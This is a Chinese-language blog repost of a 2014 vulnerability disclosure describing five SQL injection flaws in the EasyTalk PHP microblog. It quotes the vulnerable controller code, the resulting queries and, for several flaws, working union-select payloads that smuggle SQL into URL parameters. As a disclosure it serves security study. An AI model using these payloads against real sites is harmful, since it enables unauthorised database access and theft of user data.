记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

EasyTalk Sql Injection 1-5

2014-05-10 12:35

注入1:

在topicaction.class.php中



public function topic() {

$keyword=$this->_get('keyword','urldecode');//无过滤 且解码

if ($keyword) {

$topic = D('Topic')->where("topicname='$keyword'")->find();

if ($topic) {

$isfollow=D('Mytopic')->isfollow($topic['id'],$this->my['user_id']);

$topicusers=D('MytopicView')->where("topicid='$topic[id]'")->order('id desc')->limit(9)->select();

//getwidget

$widget=M('Topicwidget')->where("topicid='$topic[id]'")->order('`order` ASC')->select();

if ($widget) {

foreach ($widget as $val) {

$topicwidget[$val['widgettype']][]=$val;

}

}

$this->assign('topicwidget',$topicwidget);

} else {

$count=$isfollow=0;

}





$topic = D('Topic')->where("topicname='$keyword'")->find();



这里 带入查询。



where topicname='keyword';





SELECT * FROM `et_topic` WHERE topicname='aaa' LIMIT 1



构造一下 aaa' and 1=2 union select 1,2,3,user(),5 %23



完美注入。

FLOG87(6(ZPYF746_WNC14Q.jpg





注入2:



在settingaction.class.php 中



public function doauth() {

$_authmsg=daddslashes($_GET['auth']);

$authmsg=base64_decode($_authmsg);

$tem=explode(":",$authmsg);

$send_id=$tem[0];

$user=M('Users');



$row = $user->field('mailadres,auth_email')->where("user_id='$send_id'")->find();

if ($_authmsg==$row['auth_email']) {

$user->where("user_id='$send_id'")->setField('auth_email',1);

setcookie('setok', json_encode(array('lang'=>L('mail6'),'ico'=>1)),0,'/');

} else {

setcookie('setok', json_encode(array('lang'=>L('mail7'),'ico'=>2)),0,'/');

}

header('location:'.SITE_URL.'/?m=setting&a=mailauth');

}





$_authmsg 虽然用addslashes 进行处理后 但是 后面解码。



所以 无视过滤。

然后切割成数组 数组的第一个 带入查询。

$row = $user->field('mailadres,auth_email')->where("user_id='$send_id'")->find();



where user_id = '$send_id'



完美注入。 无视Gpc

首先编码一下 然后注入

SELECT `mailadres`,`auth_email` FROM `et_users` WHERE user_id='yu' union select user(),2#' LIMIT 1



F2)_R}R{VZDIMRLUG3NUO0U.jpg







完美注入。



注入3:

在messageaction.class.php中。



public function show() {

$uid=$_GET['uid'];



$mes=M('Messages');



$count = $mes->where("(senduid='".$this->my['user_id']."' AND sendtouid='$uid') OR (senduid='$uid' AND sendtouid='".$this->my['user_id']."')")->count();

$p= new Page($count,20);

$page = $p->show('message/show/uid/'.$uid.'/p/',1,'action-for="stream"');

$data = D('MessagesView')->where("(senduid='".$this->my['user_id']."' AND sendtouid='$uid') OR (senduid='$uid' AND sendtouid='".$this->my['user_id']."')")->order("message_id DESC")->limit($p->firstRow.','.$p->listRows)->select();





$uid 无过滤 直接带入了查询。



$count = $mes->where("(senduid='".$this->my['user_id']."' AND sendtouid='$uid') OR (senduid='$uid' AND sendtouid='".$this->my['user_id']."')")->count();



SELECT COUNT(*) AS tp_count FROM `et_messages` WHERE (senduid='2' AND sendtouid='aaaa' AND sendtouid='2') LIMIT 1

执行的sql 构造一下语句。

LW7K~MBNXK3$B[0G2RNQWHX.jpg





有图有真相。

注入4:

在photoaction.class.php中



public function show() {

$cid=$_GET['cid'];



$content=D('ContentView')->where("content_id='$cid' AND FIND_IN_SET('p',filetype)")->find();

if (!$content) {

$this->display('nophoto');

exit;

}



$cModel=M('Content');

$count=$cModel->where("user_id='$content[user_id]' AND FIND_IN_SET('p',filetype)")->count();



$cid 无过滤 且直接带入了



where("content_id='$cid' AND FIND_IN_SET('p',filetype)")->find();



content_id=$cid





SELECT Content.content_id AS content_id,Content.content_body AS content_body,Content.posttime AS posttime,Content.type AS type,Content.filetype AS filetype,Content.retid AS retid,Content.replyid AS replyid,Content.replytimes AS replytimes,Content.zftimes AS zftimes,Content.pinbi AS pinbi,Content.zhiding AS zhiding,Content.praisetimes AS praisetimes,Plugins.name AS appname,Plugins.directory AS directory,Plugins.available AS available,Plugins.type AS apptype,Users.user_id AS user_id,Users.user_name AS user_name,Users.nickname AS nickname,Users.user_head AS user_head,Users.user_auth AS user_auth,Users.provinceid AS provinceid,Users.cityid AS cityid FROM et_content Content ignore index(replyid) LEFT JOIN et_plugins Plugins ON Content.type=Plugins.directory LEFT JOIN et_users Users ON Content.user_id=Users.user_id WHERE content_id='aaa' AND FIND_IN_SET('p',filetype) LIMIT 1



这个是执行的语句 来构造一下语句。

T_T`[DOJ}15T9FRZ`[N@ELP.jpg





注入成功 有图有真相。



注入5:

在appaction.class.php中



public function applist() {

parent::tologin();

import("@.ORG.Page");

C('PAGE_NUMBERS',10);

$pvmodel=D('PluginsView');

$keyword=trim(htmlspecialchars($_REQUEST['keyword']));



if (!$keyword) {

$count=M('Plugins')->where("available=1 AND (type='app' || type='api')")->count();

$p= new Page($count,20);

$page = $p->show("?m=app&a=applist&p=");

$app=$pvmodel->where("available=1 AND (type='app' || type='api')")->order("installs DESC")->limit($p->firstRow.','.$p->listRows)->select();

} else {

$count=$pvmodel->where("name LIKE '%$keyword%' AND available=1 AND (type='app' || type='api')")->count();

$p= new Page($count,20);

$page = $p->show("?m=app&a=applist&keyword=$keyword&p=");

$app=$pvmodel->where("name LIKE '%$keyword%' AND available=1 AND (type='app' || type='api')")->order("installs DESC")->limit($p->firstRow.','.$p->listRows)->select();





$KEYWORD为 request 获取的 然后html实体 但是对注入的影响不大。



如果keyword 为true的话就带入

$count=$pvmodel->where("name LIKE '%$keyword%' AND available=1 AND (type='app' || type='api')")->count();



SELECT COUNT(*) AS tp_count FROM et_plugins Plugins LEFT JOIN et_users Users ON Plugins.appauthor=Users.user_id WHERE name LIKE '%yu%' AND available=1 AND (type='app' || type='api') LIMIT 1



所执行的语句 构造一下

JQAL[HG0E1O}IAW1}TTL0SN.jpg





注入成功 有图有真相

漏洞证明:

修复方案:

过滤呗。

知识来源: www.wooyun.org/bugs/wooyun-2014-050338

阅读:69469 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“EasyTalk Sql Injection 1-5”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云